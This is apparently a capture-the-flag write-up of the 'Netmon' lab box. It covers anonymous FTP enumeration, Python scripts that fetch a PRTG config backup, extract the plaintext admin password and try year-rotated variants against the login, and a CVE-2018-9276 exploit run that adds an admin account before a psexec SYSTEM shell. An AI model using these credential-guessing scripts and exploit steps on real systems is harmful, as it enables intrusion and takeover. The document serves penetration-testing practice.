
Netmon

Tags: Easy, Internal, Enumeration, FTP, Penetration Tester Level 1, Weak Authentication, CVE-2018-9276, CVE Exploitation, Public Vulnerabilities, Remote Code Execution


$ nmap -sV -sC -Pn --min-rate 10000 10.129.96.142
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 21:08 EDT
Nmap scan report for 10.129.96.142
Host is up (0.057s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
80/tcp  open  http        Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open  msrpc       Microsoft Windows RPC
139/tcp open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp open  tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-05-31T01:08:29
|_  start_date: 2022-05-31T01:06:52
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.05 seconds
$ ftp 10.129.96.142
Connected to 10.129.96.142.
220 Microsoft FTP Service
Name (10.129.96.142:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp>

The user flag, Users\user.txt, can be read straight off the anonymous FTP share.

The rest of the filesystem is browsable too. After some looking around, PRTG's data directory turns out to hold the configuration backups we need:

ftp> cd "/ProgramData/Paessler/PRTG Network Monitor"
ftp> get "PRTG Configuration.old.bak"

The get of "PRTG Configuration.old.bak" sometimes closes the connection by itself mid-transfer, so repeat it until you have the full file, or at least the part containing the credentials:
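Instead of re-running get by hand, the download can be resumed from the bytes already on disk. The script below is an added example, not part of the original writeup: it uses ftplib with a REST offset to continue an interrupted transfer and checks the final size against the server's MS-DOS style directory listing (Microsoft ftpd refuses SIZE in ASCII mode, so the listing is the more reliable source). The host and path are the ones from this box; the e-mail used as the anonymous password is made up.

```python
"""Resumable download of the PRTG config backup over anonymous FTP.

Added example (not from the original writeup). The transfer of
"PRTG Configuration.old.bak" tends to drop mid-way, so this resumes
with REST from the bytes already on disk and compares the result with
the size reported in the server's directory listing.
"""
import os
import re
from datetime import datetime
from ftplib import FTP, error_temp

HOST = "10.129.96.142"
REMOTE_DIR = "/ProgramData/Paessler/PRTG Network Monitor"
REMOTE_NAME = "PRTG Configuration.old.bak"

# Microsoft ftpd lists files MS-DOS style: "MM-DD-YY  HH:MMAM  <size|<DIR>>  name"
_MSDOS_LINE = re.compile(
    r"^(\d{2}-\d{2}-\d{2})\s+(\d{2}:\d{2}[AP]M)\s+(<DIR>|\d+)\s+(.+?)\s*$"
)


def parse_msdos_listing(line: str):
    """Return (mtime, size or None for a directory, name) for one listing line, else None."""
    m = _MSDOS_LINE.match(line)
    if not m:
        return None
    date, clock, size, name = m.groups()
    mtime = datetime.strptime(f"{date} {clock}", "%m-%d-%y %I:%M%p")
    return mtime, (None if size == "<DIR>" else int(size)), name


def resume_offset(local_path: str) -> int:
    """Bytes already on disk; sent as the REST offset so the server continues from there."""
    try:
        return os.path.getsize(local_path)
    except OSError:
        return 0


def fetch_with_resume(host, remote_dir, remote_name, local_path,
                      attempts=10, user="anonymous", passwd="anon@example.com"):
    """Download remote_name, resuming after every dropped connection; returns bytes on disk."""
    for attempt in range(1, attempts + 1):
        offset = resume_offset(local_path)
        expected = None
        try:
            with FTP(host, timeout=30) as ftp:
                ftp.login(user, passwd)
                ftp.cwd(remote_dir)
                # Expected size comes from the LIST output (parsed with the helper above).
                lines = []
                ftp.dir(lines.append)
                for entry in map(parse_msdos_listing, lines):
                    if entry and entry[2] == remote_name:
                        expected = entry[1]
                if expected is not None and offset >= expected:
                    return offset
                # Append mode plus REST: the server starts sending at byte `offset`.
                with open(local_path, "ab") as fh:
                    ftp.retrbinary(f"RETR {remote_name}", fh.write, rest=offset or None)
            got = resume_offset(local_path)
            if expected is None or got >= expected:
                return got
            print(f"attempt {attempt}: {got}/{expected} bytes on disk, resuming")
        except (EOFError, OSError, error_temp) as exc:
            print(f"attempt {attempt}: connection dropped ({exc}), "
                  f"resuming from byte {resume_offset(local_path)}")
    raise RuntimeError(f"{remote_name}: transfer never completed")


if __name__ == "__main__":
    n = fetch_with_resume(HOST, REMOTE_DIR, REMOTE_NAME, REMOTE_NAME)
    print(f"{n} bytes written to {REMOTE_NAME}")
```

Run it from the attacking box with network access to the target; each dropped connection prints the offset it resumes from, and the loop stops once the local file reaches the size shown in the listing.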

...
</dbcredentials>
    <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
    </dbpassword>
<dbtimeout>
...

That password is rejected by the PRTG web login, though. Looking back at the timestamps tells why: the .bak we pulled is from July 2018, while the live configuration (and its .old copy) was last written in February 2019, so the password has most likely been rotated since the backup was taken.

...
02-25-19  10:54PM              1189697 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
...

Trying PrTg@dmin2019 instead logs us in to the PRTG web interface as prtgadmin.
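The two steps above, pulling the credential out of the backup and guessing the rotated version from the file dates, can be done in a few lines. This is an added example, not code from the writeup: it scans the (possibly truncated) config text with a regex rather than a full XML parse, turns a password ending in a year into candidates up to the year of the live config, and optionally checks each candidate against the PRTG login. The sample config text is constructed from the fragment shown above; the login endpoint /public/checklogin.htm, its form field names and the assumption that a successful login answers with a Set-Cookie for the OCTOPUS session cookie are assumptions, not taken from this page.

```python
"""Extract the admin credential from a PRTG configuration backup and derive
year-rotated guesses. Added example, not part of the original writeup."""
import re
import urllib.error
import urllib.parse
import urllib.request

# Constructed sample: the relevant part of "PRTG Configuration.old.bak" as seen above.
SAMPLE_CONFIG = """
</dbcredentials>
    <dbpassword>
    <!-- User: prtgadmin -->
    PrTg@dmin2018
    </dbpassword>
<dbtimeout>
"""

# <dbpassword> block: optional "<!-- User: name -->" comment, then the password text.
_DBPASSWORD = re.compile(
    r"<dbpassword>\s*(?:<!--\s*User:\s*(?P<user>[^>]+?)\s*-->)?\s*"
    r"(?P<password>[^<\s]+)\s*</dbpassword>",
    re.S,
)
# A password that ends in a four-digit year, e.g. "PrTg@dmin2018".
_TRAILING_YEAR = re.compile(r"^(?P<stem>.*?)(?P<year>(?:19|20)\d{2})$")


def extract_credentials(config_text: str):
    """Return (user, password) pairs for every <dbpassword> block; user may be None."""
    return [(m.group("user"), m.group("password")) for m in _DBPASSWORD.finditer(config_text)]


def rotated_candidates(password: str, newest_year: int):
    """If the password ends in a year, return it re-suffixed with every year from
    newest_year (the live config's timestamp) back to the original, newest first."""
    m = _TRAILING_YEAR.match(password)
    if not m:
        return [password]
    stem, year = m.group("stem"), int(m.group("year"))
    return [f"{stem}{y}" for y in range(newest_year, year - 1, -1)]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # keep the 302 so we can read its Set-Cookie headers


def try_login(base_url: str, user: str, password: str) -> bool:
    """Assumption: PRTG's login form posts username/password to /public/checklogin.htm
    and a successful login replies with a Set-Cookie for the OCTOPUS<version> cookie."""
    data = urllib.parse.urlencode({"username": user, "password": password}).encode()
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        resp = opener.open(f"{base_url}/public/checklogin.htm", data=data, timeout=15)
    except urllib.error.HTTPError as err:
        resp = err  # with redirects disabled the 302 surfaces as an HTTPError
    cookies = resp.headers.get_all("Set-Cookie") or []
    return any(c.startswith("OCTOPUS") for c in cookies)


if __name__ == "__main__":
    for user, password in extract_credentials(SAMPLE_CONFIG):
        # 2019: the live "PRTG Configuration.dat" is dated 02-25-19 in the listing.
        for candidate in rotated_candidates(password, 2019):
            if try_login("http://10.129.96.142", user or "prtgadmin", candidate):
                print(f"valid: {user}:{candidate}")
                break
            print(f"rejected: {user}:{candidate}")
```

The candidate order matters: the most recent year is tried first, which on this box is the one that works, and the original value is kept last in case the password was never rotated.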

Download the CVE-2018-9276 exploit script prtg-exploit.sh from github.com/chcx and run it against the target with the authenticated session cookie:

$ chmod +x prtg-exploit.sh
$ ./prtg-exploit.sh -u http://10.129.96.142 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"

The -c value is the cookie string of the prtgadmin session (including the OCTOPUS session cookie), copied from the browser after logging in. CVE-2018-9276 is an authenticated OS command injection in PRTG's notification settings; the script uses it to create a local administrator account pentest with password P3nT3st!. With that account, impacket's psexec.py gives a shell:

$ ~/Documents/impacket/examples/psexec.py pentest:'P3nT3st!'@10.129.96.142

psexec.py runs its service as SYSTEM, so that is the box done.